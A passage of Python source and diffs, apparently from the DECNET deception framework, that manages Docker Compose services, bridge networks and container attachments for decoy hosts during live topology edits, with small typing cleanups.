"host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
"name": decky.name,
"services": services,
"decky_config": target.model_dump(mode="json"),
"decky_ip": decky.ip,
"state": "running",
})
async def _add_fleet_service(
repo: BaseRepository,
decky_name: str,
service_name: str,
initial_config: dict | None = None,
) -> list[str]:
config, compose_path = _fleet_state_or_raise()
decky = _fleet_find_decky(config, decky_name)
services: list[str] = list(decky.services or [])
if service_name in services:
raise ServiceConflictError(
f"service {service_name!r} already on decky {decky_name!r}"
)
services.append(service_name)
if initial_config:
# Same path as _update_fleet_service_config: stash the validated
# cfg on the decky model so the compose write picks it up.
sc = dict(getattr(decky, "service_config", None) or {})
sc[service_name] = initial_config
decky.service_config = sc
await _persist_fleet_change(repo, decky, services, compose_path)
swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
if swarm_host_uuid:
# Master has no container for this decky — re-push the host's
# shard so the worker materialises the new service.
await _redispatch_fleet_shard(repo, swarm_host_uuid)
else:
target = f"{decky_name}-{service_name}"
await anyio.to_thread.run_sync(
lambda: _compose(
"up", "-d", "--no-deps", "--build", target,
compose_file=compose_path,
),
)
return services
async def _remove_fleet_service(
repo: BaseRepository, decky_name: str, service_name: str,
) -> list[str]:
config, compose_path = _fleet_state_or_raise()
decky = _fleet_find_decky(config, decky_name)
services: list[str] = list(decky.services or [])
if service_name not in services:
raise ServiceConflictError(
f"service {service_name!r} not on decky {decky_name!r}"
)
services = [s for s in services if s != service_name]
target = f"{decky_name}-{service_name}"
swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
if not swarm_host_uuid:
# Local: stop+rm before persist so the operator has a clear retry
# state if compose fails halfway. Swarm: skip — the worker's compose
# will handle the removal when the redispatched config drops the
# service from the decky.
await anyio.to_thread.run_sync(
lambda: _compose("stop", target, compose_file=compose_path),
)
await anyio.to_thread.run_sync(
lambda: _compose("rm", "-f", target, compose_file=compose_path),
)
await _persist_fleet_change(repo, decky, services, compose_path)
if swarm_host_uuid:
await _redispatch_fleet_shard(repo, swarm_host_uuid)
return services
# ---------------------------------------------------------- public api
async def add_service(
repo: BaseRepository,
*,
decky_kind: DeckyKind,
decky_name: str,
service_name: str,
topology_id: Optional[str] = None,
config: dict | None = None,
) -> list[str]:
"""Add *service_name* to a deployed decky.
Validates the service registry (rejects unknown / fleet_singleton
names) and the optional ``config`` against the service's schema,
persists the change, regenerates the compose file, runs
``up -d --no-deps --build <decky>-<service>`` in a worker thread,
and publishes ``decky.<name>.service.added`` on the bus.
``config`` is the same dict shape PUT/POST .../config accepts; it's
coerced via ``BaseService.validate_cfg`` before any state write so
a 400-class failure leaves zero side-effects.
Returns the post-mutation services list.
"""
svc = _validate_service_for_per_decky(service_name)
initial_config = svc.validate_cfg(config) if config else {}
if decky_kind == "topology":
if not topology_id:
raise ServiceMutationError(
"decky_kind=topology requires topology_id",
)
services = await _add_topology_service(
repo, topology_id, decky_name, service_name,
initial_config=initial_config,
)
elif decky_kind == "fleet":
services = await _add_fleet_service(
repo, decky_name, service_name,
initial_config=initial_config,
)
else: # pragma: no cover — Literal narrows
raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
await _publish(
topics.decky(decky_name, topics.DECKY_SERVICE_ADDED),
{
"decky_name": decky_name,
"service_name": service_name,
"topology_id": topology_id,
"services": services,
},
)
log.info(
"services_live.add decky=%s topology=%s service=%s",
decky_name, topology_id, service_name,
)
return services
async def update_service_config(
repo: BaseRepository,
*,
decky_kind: DeckyKind,
decky_name: str,
service_name: str,
cfg: dict,
apply: bool = False,
topology_id: Optional[str] = None,
) -> dict:
"""Persist ``cfg`` as the new ``service_config[service_name]`` for a decky.
The submitted dict is validated against the service's
``config_schema`` (unknown keys dropped, types coerced) BEFORE any
DB write, so a 400-class failure leaves zero side-effects.
``apply=False`` (Save): only the DB row + compose file are updated.
The running container keeps its old env.
``apply=True`` (Apply): same persistence, then a force-recreate of
``<decky>-<service>`` so the container picks
up the new env. Destructive: drops any
in-container session state on that service.
Returns the post-mutation validated cfg.
"""
svc = _validate_service_for_per_decky(service_name)
validated = svc.validate_cfg(cfg)
if decky_kind == "topology":
if not topology_id:
raise ServiceMutationError(
"decky_kind=topology requires topology_id",
)
await _update_topology_service_config(
repo, topology_id, decky_name, service_name, validated, apply=apply,
)
elif decky_kind == "fleet":
await _update_fleet_service_config(
repo, decky_name, service_name, validated, apply=apply,
)
else: # pragma: no cover
raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
await _publish(
topics.decky(decky_name, topics.DECKY_SERVICE_CONFIG_CHANGED),
{
"decky_name": decky_name,
"service_name": service_name,
"topology_id": topology_id,
"service_config": validated,
"recreated": bool(apply),
},
)
log.info(
"services_live.update_config decky=%s topology=%s service=%s apply=%s",
decky_name, topology_id, service_name, apply,
)
return validated
async def _update_topology_service_config(
repo: BaseRepository,
topology_id: str,
decky_name: str,
service_name: str,
validated: dict,
*,
apply: bool,
) -> None:
decky = await _topology_decky(repo, topology_id, decky_name)
if service_name not in (decky.get("services") or []):
raise ServiceConflictError(
f"service {service_name!r} not on decky {decky_name!r}"
)
cfg_blob = dict(decky.get("decky_config") or {})
sc = dict(cfg_blob.get("service_config") or {})
sc[service_name] = validated
cfg_blob["service_config"] = sc
await repo.update_topology_decky(decky["uuid"], {"decky_config": cfg_blob})
compose_path = await _rerender_topology_compose(repo, topology_id)
if apply:
if await _topology_is_agent_pinned(repo, topology_id):
await _resync_agent_topology(repo, topology_id)
else:
target = f"{decky_name}-{service_name}"
await anyio.to_thread.run_sync(
lambda: _compose(
"up", "-d", "--no-deps", "--force-recreate", "--build", target,
compose_file=compose_path,
),
)
async def _update_fleet_service_config(
repo: BaseRepository,
decky_name: str,
service_name: str,
validated: dict,
*,
apply: bool,
) -> None:
config, compose_path = _fleet_state_or_raise()
decky = _fleet_find_decky(config, decky_name)
if service_name not in (decky.services or []):
raise ServiceConflictError(
f"service {service_name!r} not on decky {decky_name!r}"
)
sc = dict(getattr(decky, "service_config", None) or {})
sc[service_name] = validated
decky.service_config = sc
_save_state(config, compose_path)
_write_compose(config, compose_path)
from decnet.web.db.models import LOCAL_HOST_SENTINEL
await repo.upsert_fleet_decky({
"host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
"name": decky.name,
"services": list(decky.services or []),
"decky_config": decky.model_dump(mode="json"),
"decky_ip": decky.ip,
"state": "running",
})
if apply:
swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
if swarm_host_uuid:
await _redispatch_fleet_shard(repo, swarm_host_uuid)
else:
target = f"{decky_name}-{service_name}"
# Docker Compose tracks the previous container by ID. If that
# container was already removed (or renamed during a prior failed
# deploy), --force-recreate fails with "No such container". Pre-
# remove by name so Compose starts from a clean slate.
await anyio.to_thread.run_sync(
lambda: subprocess.run( # nosec B603 B607
["docker", "rm", "-f", target],
capture_output=True,
),
)
await anyio.to_thread.run_sync(
lambda: _compose(
"up", "-d", "--no-deps", "--force-recreate", "--build", target,
compose_file=compose_path,
),
)
async def remove_service(
repo: BaseRepository,
*,
decky_kind: DeckyKind,
decky_name: str,
service_name: str,
topology_id: Optional[str] = None,
) -> list[str]:
"""Remove *service_name* from a deployed decky.
Stops + removes the service container, persists the new services
list, re-renders the compose file (so the next ``up -d`` doesn't
bring it back), and publishes ``decky.<name>.service.removed``.
Returns the post-mutation services list.
"""
if decky_kind == "topology":
if not topology_id:
raise ServiceMutationError(
"decky_kind=topology requires topology_id",
)
services = await _remove_topology_service(
repo, topology_id, decky_name, service_name,
)
elif decky_kind == "fleet":
services = await _remove_fleet_service(repo, decky_name, service_name)
else: # pragma: no cover
raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
await _publish(
topics.decky(decky_name, topics.DECKY_SERVICE_REMOVED),
{
"decky_name": decky_name,
"service_name": service_name,
"topology_id": topology_id,
"services": services,
},
)
log.info(
"services_live.remove decky=%s topology=%s service=%s",
decky_name, topology_id, service_name,
)
return services

View File

@@ -114,6 +114,11 @@ DECNET_SWARM_MASTER_HOST: str | None = os.environ.get("DECNET_SWARM_MASTER_HOST"
DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID")
DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST")
DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770)
# Bind address for the master-side swarm controller. Loopback by default —
# operators flip to 0.0.0.0 (or a specific NIC) on production masters where
# workers heartbeat in over mTLS from other hosts. Seeded by [swarm]
# swarmctl-host in /etc/decnet/decnet.ini.
DECNET_SWARMCTL_HOST: str = os.environ.get("DECNET_SWARMCTL_HOST", "127.0.0.1")
# Ingester batching: how many log rows to accumulate per commit, and the
# max wait (ms) before flushing a partial batch. Larger batches reduce

View File

@@ -9,7 +9,7 @@ from decnet.geoip.base import Provider
from decnet.geoip.lookup import Lookup
from decnet.geoip.paths import ensure_root
from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all
from decnet.geoip.rir.parse import parse_file
from decnet.geoip.rir.parse import Range, parse_file
logger = logging.getLogger("decnet.geoip.rir.provider")
@@ -45,7 +45,7 @@ class RirProvider(Provider):
except Exception as exc:
logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc)
ranges = []
ranges: list[Range] = []
for path in self.data_paths():
if not path.exists():
continue

View File

@@ -28,7 +28,7 @@ class _ComponentFilter(logging.Filter):
self.component = component
def filter(self, record: logging.LogRecord) -> bool:
record.decnet_component = self.component # type: ignore[attr-defined]
record.decnet_component = self.component
return True
@@ -49,14 +49,14 @@ class _TraceContextFilter(logging.Filter):
span = trace.get_current_span()
ctx = span.get_span_context()
if ctx and ctx.trace_id:
record.otel_trace_id = format(ctx.trace_id, "032x") # type: ignore[attr-defined]
record.otel_span_id = format(ctx.span_id, "016x") # type: ignore[attr-defined]
record.otel_trace_id = format(ctx.trace_id, "032x")
record.otel_span_id = format(ctx.span_id, "016x")
else:
record.otel_trace_id = "0" # type: ignore[attr-defined]
record.otel_span_id = "0" # type: ignore[attr-defined]
record.otel_trace_id = "0"
record.otel_span_id = "0"
except Exception:
record.otel_trace_id = "0" # type: ignore[attr-defined]
record.otel_span_id = "0" # type: ignore[attr-defined]
record.otel_trace_id = "0"
record.otel_span_id = "0"
return True

View File

@@ -289,13 +289,13 @@ async def reconcile_agent_resyncs(repo: BaseRepository) -> int:
return 0
drained = 0
for topo in pending:
tid = topo["id"]
tid = topo.id
try:
await _deployer.resync_agent_topology(repo, tid)
await repo.set_topology_resync(tid, False)
drained += 1
log.info("topology %s resynced to agent %s",
tid, topo.get("target_host_uuid"))
tid, topo.target_host_uuid)
except Exception as exc: # noqa: BLE001
log.warning(
"topology %s resync failed (will retry): %s", tid, exc,

View File

@@ -98,6 +98,463 @@ def _decky_by_name(hydrated: dict[str, Any], name: str) -> Optional[dict]:
)
async def _materialise_lan_change(
repo: Any,
topology_id: str,
*,
created: Optional[tuple[str, str, bool]] = None,
removed: Optional[str] = None,
) -> None:
"""Create or remove the docker bridge for a live LAN op + re-render compose.
Called from ``apply_add_lan`` / ``apply_remove_lan`` after the DB
write lands. Skips when:
* the topology is not active/degraded (a pending topology gets its
networks created at deploy time),
* the topology is pinned to a swarm agent (cross-host materialisation
isn't implemented; the agent's apply_topology RPC re-renders the
whole compose at next push),
* the docker SDK / networking primitive raises (logged, not
re-raised — the DB row is the source of truth).
"""
topology = await repo.get_topology(topology_id)
if topology is None:
return
status = topology.status
if status not in ("active", "degraded"):
return
if topology.target_host_uuid:
_log.info(
"live LAN op skipped (agent-pinned topology=%s); next agent push will reconcile",
topology_id,
)
return
# Lazy imports — these pull in docker.py / network.py which both
# require the docker SDK; keeping them out of module-import keeps
# the mutator usable in test environments that stub docker.
import docker
from decnet.engine.deployer import _topology_compose_path
from decnet.network import create_bridge_network, remove_bridge_network
from decnet.topology.compose import _network_name, write_topology_compose
client = docker.from_env()
try:
if created is not None:
name, subnet, is_dmz = created
net_name = _network_name(topology_id, name)
try:
create_bridge_network(
client, net_name, subnet, internal=not is_dmz,
)
except Exception as exc: # noqa: BLE001
_log.error(
"live add_lan: bridge create failed topology=%s lan=%s subnet=%s: %s",
topology_id, name, subnet, exc,
)
# Don't re-raise — the DB row is the source of truth.
# Operator can retry by removing + re-adding the LAN.
if removed is not None:
net_name = _network_name(topology_id, removed)
try:
remove_bridge_network(client, net_name)
except Exception as exc: # noqa: BLE001
_log.warning(
"live remove_lan: bridge remove failed topology=%s lan=%s: %s",
topology_id, removed, exc,
)
# Re-render compose so the file on disk matches the DB. Even
# when the bridge create above failed, a future redeploy will
# try to bring the network back from the compose definition.
hydrated = await hydrate(repo, topology_id)
if hydrated is not None:
try:
write_topology_compose(
hydrated, _topology_compose_path(topology_id),
)
except Exception as exc: # noqa: BLE001
_log.warning(
"live LAN op: compose re-render failed topology=%s: %s",
topology_id, exc,
)
except Exception as exc: # noqa: BLE001 — outer net for any docker SDK failure
_log.error(
"live LAN materialisation crashed topology=%s: %s",
topology_id, exc,
)
def _is_buildx_wedge(exc: BaseException) -> bool:
"""True when *exc* looks like the buildx EROFS wedge.
We consult both the structured CalledProcessError.stderr and the
str(exc) form because ``_compose_with_retry`` raises a synthetic
CalledProcessError whose ``stderr`` contains the recovery hint
(which preserves the wedge signatures verbatim).
"""
from decnet.engine.deployer import (
_BUILDX_EROFS_SIGNATURE, _BUILDX_WEDGE_SIGNATURE,
)
stderr = ""
if hasattr(exc, "stderr") and exc.stderr:
stderr = str(exc.stderr)
haystack = (stderr + " " + str(exc)).lower()
return (
_BUILDX_WEDGE_SIGNATURE in haystack
and _BUILDX_EROFS_SIGNATURE in haystack
)
async def _compose_up_with_buildkit_fallback(
*args: str, compose_file, label: str,
) -> None:
"""Run ``compose up`` and auto-fall-back to the legacy builder on wedge.
The buildx activity dir occasionally lands on a read-only mount —
happens enough on operator dev boxes that we don't want a single
wedge to abort a live decky-add. When _compose_with_retry raises
with the EROFS-wedge signatures, we retry once with
``DOCKER_BUILDKIT=0`` set. The legacy (non-buildx) builder doesn't
use the activity dir and isn't affected.
*label* is a human-readable identifier used only in log lines so an
operator can grep the fall-back back to the originating op.
"""
import anyio
from decnet.engine.deployer import _compose_with_retry
try:
await anyio.to_thread.run_sync(
lambda: _compose_with_retry(*args, compose_file=compose_file),
)
return
except Exception as exc: # noqa: BLE001
if not _is_buildx_wedge(exc):
raise
_log.warning(
"%s: buildx wedge detected; retrying with DOCKER_BUILDKIT=0 "
"(legacy builder). Recover the buildx state at your leisure: "
"rm -rf ~/.docker/buildx/activity && "
"docker buildx create --name decnet-builder --use --bootstrap",
label,
)
# Outside the except so the second attempt's traceback isn't
# nested under the first failure if it also blows up.
await anyio.to_thread.run_sync(
lambda: _compose_with_retry(
*args, compose_file=compose_file,
env={"DOCKER_BUILDKIT": "0"},
),
)
def _decky_targets(decky_name: str, services: list[str]) -> list[str]:
"""Compose service names for one decky: base + each per-decky service.
Skips ``fleet_singleton`` services — those run once fleet-wide and
don't have a per-decky compose entry. Mirrors the same filter
applied at compose-render time
(:mod:`decnet.topology.compose.generate_topology_compose`).
"""
from decnet.services.registry import get_service
targets = [decky_name]
for svc_name in services:
try:
svc = get_service(svc_name)
except KeyError:
# Unknown service — leave it; the compose render won't emit
# a fragment for it, so compose up will simply ignore the
# name with a clear "no such service" error. Surface that
# rather than silently dropping it.
targets.append(f"{decky_name}-{svc_name}")
continue
if svc.fleet_singleton:
continue
targets.append(f"{decky_name}-{svc_name}")
return targets
async def _live_topology_or_none(
repo: Any, topology_id: str,
) -> Optional[dict[str, Any]]:
"""Return the topology row only when it's eligible for live materialisation.
Returns None (so callers can skip with a single ``if`` check) when:
* the topology doesn't exist;
* status is not ``active`` or ``degraded`` (pending topologies get
everything materialised at deploy time);
* the topology is pinned to a swarm agent (cross-host live editing
is its own routing workstream).
"""
topology = await repo.get_topology(topology_id)
if topology is None:
return None
if topology.status not in ("active", "degraded"):
return None
if topology.target_host_uuid:
_log.info(
"live decky op skipped (agent-pinned topology=%s); "
"next agent push will reconcile",
topology_id,
)
return None
return topology
async def _rerender_compose(repo: Any, topology_id: str) -> None:
"""Re-render the per-topology compose file from the current DB.
Called after each materialisation step so the file on disk matches
the topology rows. Soft-fails: a render error is logged but
doesn't poison the DB-side mutation.
"""
from decnet.engine.deployer import _topology_compose_path
from decnet.topology.compose import write_topology_compose
hydrated = await hydrate(repo, topology_id)
if hydrated is None:
return
try:
write_topology_compose(hydrated, _topology_compose_path(topology_id))
except Exception as exc: # noqa: BLE001
_log.warning(
"live op: compose re-render failed topology=%s: %s",
topology_id, exc,
)
async def _materialise_decky_spawn(
repo: Any, topology_id: str, decky_name: str, services: list[str],
) -> bool:
"""compose up -d --no-deps --build for one decky (base + services).
Re-renders compose first so the file lists the new decky. Returns
True when compose-up reported success, False otherwise (or when
the topology isn't eligible for live materialisation — pending
topologies skip and return False so the caller doesn't flip the
state to ``running`` based on a no-op). Best-effort: docker
failure is logged, not re-raised — DB row is the source of truth.
"""
if await _live_topology_or_none(repo, topology_id) is None:
return False
from decnet.engine.deployer import _topology_compose_path
await _rerender_compose(repo, topology_id)
targets = _decky_targets(decky_name, services)
compose_path = _topology_compose_path(topology_id)
try:
await _compose_up_with_buildkit_fallback(
"up", "-d", "--no-deps", "--build", *targets,
compose_file=compose_path,
label=f"live add_decky topology={topology_id} decky={decky_name}",
)
return True
except Exception as exc: # noqa: BLE001
_log.error(
"live add_decky: compose up failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
return False
async def _materialise_decky_remove(
repo: Any, topology_id: str, decky_name: str, services: list[str],
) -> None:
"""compose stop + rm -f for one decky's containers, then re-render."""
if await _live_topology_or_none(repo, topology_id) is None:
return
import anyio
from decnet.engine.deployer import _compose, _topology_compose_path
targets = _decky_targets(decky_name, services)
compose_path = _topology_compose_path(topology_id)
# Stop + rm BEFORE re-rendering compose; the re-rendered file no
# longer mentions the decky, so a stop run AFTER rendering would
# find no service to act on.
try:
await anyio.to_thread.run_sync(
lambda: _compose("stop", *targets, compose_file=compose_path),
)
except Exception as exc: # noqa: BLE001
_log.warning(
"live remove_decky: compose stop failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
try:
await anyio.to_thread.run_sync(
lambda: _compose("rm", "-f", *targets, compose_file=compose_path),
)
except Exception as exc: # noqa: BLE001
_log.warning(
"live remove_decky: compose rm failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
await _rerender_compose(repo, topology_id)
async def _materialise_decky_connect(
repo: Any, topology_id: str,
decky_name: str, lan_name: str, ipv4_address: str,
) -> None:
"""SDK ``network.connect`` to multi-home a running base container.
Service containers share the base's netns via ``network_mode:
service:<base>`` (see :mod:`decnet.topology.compose`), so attaching
the base alone gives every service container the new interface for
free — we don't need to iterate.
"""
if await _live_topology_or_none(repo, topology_id) is None:
return
import docker
from decnet.topology.compose import _container_name, _network_name
net_name = _network_name(topology_id, lan_name)
container_name = _container_name(topology_id, decky_name)
try:
client = docker.from_env()
net = client.networks.get(net_name)
container = client.containers.get(container_name)
net.connect(container, ipv4_address=ipv4_address)
except docker.errors.APIError as exc:
# Idempotency — already on the network is fine.
msg = str(exc).lower()
if "already" in msg or "endpoint" in msg and "exists" in msg:
_log.info(
"live attach_decky: %s already on network %s — skipping",
container_name, net_name,
)
else:
_log.error(
"live attach_decky: connect failed topology=%s decky=%s lan=%s: %s",
topology_id, decky_name, lan_name, exc,
)
except Exception as exc: # noqa: BLE001
_log.error(
"live attach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
topology_id, decky_name, lan_name, exc,
)
await _rerender_compose(repo, topology_id)
async def _materialise_decky_disconnect(
repo: Any, topology_id: str, decky_name: str, lan_name: str,
) -> None:
"""SDK ``network.disconnect`` to drop a multi-home edge."""
if await _live_topology_or_none(repo, topology_id) is None:
return
import docker
from decnet.topology.compose import _container_name, _network_name
net_name = _network_name(topology_id, lan_name)
container_name = _container_name(topology_id, decky_name)
try:
client = docker.from_env()
net = client.networks.get(net_name)
container = client.containers.get(container_name)
net.disconnect(container)
except docker.errors.APIError as exc:
msg = str(exc).lower()
if "not connected" in msg or "no such" in msg:
_log.info(
"live detach_decky: %s already off network %s — skipping",
container_name, net_name,
)
else:
_log.error(
"live detach_decky: disconnect failed topology=%s decky=%s lan=%s: %s",
topology_id, decky_name, lan_name, exc,
)
except Exception as exc: # noqa: BLE001
_log.error(
"live detach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
topology_id, decky_name, lan_name, exc,
)
await _rerender_compose(repo, topology_id)
async def _materialise_decky_services_diff(
repo: Any, topology_id: str,
decky_name: str,
added: list[str],
removed: list[str],
) -> None:
"""Add/remove per-service containers without touching siblings.
Mirrors :mod:`decnet.engine.services_live`'s up/down pattern but
without coupling the mutator to that module — service mutations
routed via the mutator queue publish ``mutation.applied`` while the
direct API publishes ``decky.<name>.service_added``; they share
machinery, not control flow.
"""
if not added and not removed:
return
if await _live_topology_or_none(repo, topology_id) is None:
return
import anyio
from decnet.engine.deployer import _compose, _topology_compose_path
await _rerender_compose(repo, topology_id)
compose_path = _topology_compose_path(topology_id)
add_targets = _decky_targets(decky_name, list(added))[1:] # drop the base
if add_targets:
try:
await _compose_up_with_buildkit_fallback(
"up", "-d", "--no-deps", "--build", *add_targets,
compose_file=compose_path,
label=f"live update_decky add topology={topology_id} decky={decky_name}",
)
except Exception as exc: # noqa: BLE001
_log.error(
"live update_decky add: compose up failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
rm_targets = _decky_targets(decky_name, list(removed))[1:]
for action_name, args in (("stop", ("stop",)), ("rm", ("rm", "-f"))):
if not rm_targets:
break
try:
await anyio.to_thread.run_sync(
lambda args=args: _compose(*args, *rm_targets, compose_file=compose_path), # type: ignore[misc]
)
except Exception as exc: # noqa: BLE001
_log.warning(
"live update_decky %s failed topology=%s decky=%s: %s",
action_name, topology_id, decky_name, exc,
)
async def _materialise_decky_recreate_base(
repo: Any, topology_id: str, decky_name: str,
) -> None:
"""Force-recreate just the base container (used for forwards_l3 flips).
DESTRUCTIVE: kills any in-container state on the base. Service
containers re-attach via ``network_mode: service:<base>`` after the
base is rebuilt. Caller is responsible for gating this on an
explicit operator-supplied ``force=true`` flag.
"""
if await _live_topology_or_none(repo, topology_id) is None:
return
import anyio
from decnet.engine.deployer import (
_compose_with_retry, _topology_compose_path,
)
await _rerender_compose(repo, topology_id)
compose_path = _topology_compose_path(topology_id)
try:
await anyio.to_thread.run_sync(
lambda: _compose_with_retry(
"up", "-d", "--no-deps", "--force-recreate", decky_name,
compose_file=compose_path,
),
)
except Exception as exc: # noqa: BLE001
_log.error(
"live update_decky recreate_base failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
# ------------------------------------------------------------------- ops
@@ -131,6 +588,16 @@ async def apply_add_lan(
"y": payload.get("y"),
}
)
# Live materialisation: when the topology is active/degraded, create
# the docker bridge network now and re-render the per-topology
# compose file so subsequent ``apply_add_decky`` writes a coherent
# services map. Pending topologies skip this — the next deploy
# creates everything from scratch. Agent-pinned topologies also
# skip; live editing on agents is its own routing problem.
await _materialise_lan_change(
repo, topology_id, created=(name, subnet, is_dmz),
)
await _assert_valid_after(repo, topology_id)
@@ -150,7 +617,17 @@ async def apply_remove_lan(
f"LAN {lan['name']!r} is the home LAN of decky "
f"{d['decky_config']['name']!r}; remove the decky first"
)
await repo.delete_lan(lan["id"])
lan_name = lan["name"]
# enforce_pending=False: the mutator queue is the live-editing
# surface, gated on topology status by us before we got here. The
# repo's pending-only guard is for HTTP CRUD callers that mustn't
# bypass it.
await repo.delete_lan(lan["id"], enforce_pending=False)
# Live materialisation symmetric to apply_add_lan: tear down the
# docker bridge and re-render compose so a future redeploy doesn't
# try to wire deckies into a network that no longer exists.
await _materialise_lan_change(repo, topology_id, removed=lan_name)
await _assert_valid_after(repo, topology_id)
@@ -204,11 +681,12 @@ async def apply_add_decky(
if forwards_l3:
decky_config["forwards_l3"] = True
services_list = list(payload.get("services", []))
decky_uuid = await repo.add_topology_decky(
{
"topology_id": topology_id,
"name": name,
"services": list(payload.get("services", [])),
"services": services_list,
"decky_config": decky_config,
"x": payload.get("x"),
"y": payload.get("y"),
@@ -223,6 +701,25 @@ async def apply_add_decky(
"forwards_l3": forwards_l3,
}
)
# Live materialisation: spawn the new decky's containers without
# touching siblings. Skips on pending / agent-pinned topologies —
# see _live_topology_or_none.
spawned = await _materialise_decky_spawn(
repo, topology_id, name, services_list,
)
# Flip the row's state to 'running' on success so the dashboard's
# ACTIVE DECKIES count reflects reality. Without this the row
# stays at the default 'pending' forever; the deployer's full
# post-deploy reconcile only runs on a fresh deploy_topology.
if spawned:
try:
await repo.update_topology_decky(decky_uuid, {"state": "running"})
except Exception as exc: # noqa: BLE001
_log.warning(
"live add_decky: state flip to running failed "
"topology=%s decky=%s: %s",
topology_id, name, exc,
)
await _assert_valid_after(repo, topology_id)
@@ -286,6 +783,16 @@ async def apply_attach_decky(
"forwards_l3": forwards_l3,
}
)
# Live materialisation: SDK network.connect on the base container.
# Service containers share the base's netns via network_mode:
# service:<base>, so they inherit the new interface — only the base
# needs the connect.
await _materialise_decky_connect(
repo, topology_id,
decky_name=decky["decky_config"]["name"],
lan_name=lan["name"],
ipv4_address=ip,
)
await _assert_valid_after(repo, topology_id)
@@ -329,7 +836,15 @@ async def apply_detach_decky(
await repo.update_topology_decky(
decky["uuid"], {"decky_config": new_cfg}
)
await repo.delete_topology_edge(edge["id"])
await repo.delete_topology_edge(edge["id"], enforce_pending=False)
# Live materialisation: SDK network.disconnect on the base
# container. Service containers automatically lose visibility into
# the LAN because they share the base's netns.
await _materialise_decky_disconnect(
repo, topology_id,
decky_name=decky["decky_config"]["name"],
lan_name=lan["name"],
)
await _assert_valid_after(repo, topology_id)
@@ -340,7 +855,15 @@ async def apply_remove_decky(
decky = _decky_by_name(hydrated, payload["decky"])
if decky is None:
raise MutationError(f"decky {payload['decky']!r} not found")
await repo.delete_topology_decky(decky["uuid"])
decky_name = decky["decky_config"]["name"]
services_list = list(decky.get("services") or [])
await repo.delete_topology_decky(decky["uuid"], enforce_pending=False)
# Live materialisation: stop + rm -f the decky's containers. We
# capture decky_name + services BEFORE the delete so the helper
# has the targets even though the row is gone.
await _materialise_decky_remove(
repo, topology_id, decky_name, services_list,
)
await _assert_valid_after(repo, topology_id)
@@ -354,31 +877,136 @@ async def apply_update_decky(
``patch`` — dict merged into existing ``decky_config``.
``services`` — replacement top-level services list.
``x``,``y`` — layout coords.
``force`` — opt-in for destructive recreates (currently
required when ``forwards_l3`` flips on a
live topology — see below).
Live materialisation strategy:
* **services changed** → diff old vs new; ``compose up -d`` for
added, ``compose stop`` + ``rm -f`` for removed. Mirrors the
direct API path (services_live) without coupling.
* **forwards_l3 flipped** → port publishing changes, which docker
can only apply at container-create time. Requires recreating
the base — destructive (kills in-container state, drops active
sessions). Gated on ``payload['force'] is True``; otherwise we
raise ``MutationError`` so a half-thinking operator doesn't
stomp a live decky.
* **only coords (x/y)** → DB-only. No docker work.
"""
hydrated = await _hydrated(repo, topology_id)
decky = _decky_by_name(hydrated, payload["decky"])
if decky is None:
raise MutationError(f"decky {payload['decky']!r} not found")
# Capture pre-state so we can compute the diff after the DB write.
old_services = list(decky.get("services") or [])
old_cfg = decky.get("decky_config") or {}
old_forwards_l3 = bool(old_cfg.get("forwards_l3", False))
patch: dict[str, Any] = {}
new_decky_config = old_cfg
if payload.get("patch"):
merged = dict(decky["decky_config"])
merged.update(payload["patch"])
patch["decky_config"] = merged
new_decky_config = {**old_cfg, **payload["patch"]}
patch["decky_config"] = new_decky_config
new_services = old_services
if "services" in payload:
patch["services"] = list(payload["services"])
new_services = list(payload["services"])
patch["services"] = new_services
for key in ("x", "y"):
if key in payload:
patch[key] = payload[key]
if not patch:
return
new_forwards_l3 = bool(new_decky_config.get("forwards_l3", False))
forwards_l3_flipped = new_forwards_l3 != old_forwards_l3
# Promotion path: refuse to flip a non-DMZ decky to gateway. The
# 'gateway' semantic specifically means 'host-port publisher facing
# the DMZ' — running it on an internal LAN publishes ports the
# outside world can't reach and shadows the host's port space.
# Generic L3-bridge forwards_l3 (internal multi-homing) is set by
# the generator/attach paths, not by this op, so this check only
# fires when the operator explicitly toggles the flag.
if forwards_l3_flipped and new_forwards_l3:
# Re-derive the home LAN from the edges; same logic as
# check_gateway_homed_in_dmz.
decky_uuid = decky["uuid"]
home_lan_id: Optional[str] = None
for e in hydrated["edges"]:
if e["decky_uuid"] == decky_uuid and e.get("is_bridge") is False:
home_lan_id = e["lan_id"]
break
if home_lan_id is None:
for e in hydrated["edges"]:
if e["decky_uuid"] == decky_uuid:
home_lan_id = e["lan_id"]
break
home_lan = next(
(lan for lan in hydrated["lans"] if lan["id"] == home_lan_id),
None,
)
if home_lan is None or not home_lan.get("is_dmz"):
home_name = home_lan["name"] if home_lan else "(unknown)"
raise MutationError(
f"cannot promote decky {decky['decky_config']['name']!r} "
f"to gateway: home LAN {home_name!r} is not a DMZ. "
"Move the decky to the DMZ first, or pick a different decky."
)
# Pre-check the destructive flip BEFORE any DB write, so a refused
# mutation leaves zero side-effects.
is_live = (await _live_topology_or_none(repo, topology_id)) is not None
if is_live and forwards_l3_flipped and not bool(payload.get("force")):
raise MutationError(
f"forwards_l3 flip on live decky "
f"{decky['decky_config']['name']!r} requires force=true; "
"this will recreate the base container and drop in-container state"
)
await repo.update_topology_decky(decky["uuid"], patch)
# Materialisation — only when the topology is actually live.
# _live_topology_or_none was already called above; calling the
# individual helpers re-checks (cheap) so they stay self-contained.
decky_name = decky["decky_config"]["name"]
added = sorted(set(new_services) - set(old_services))
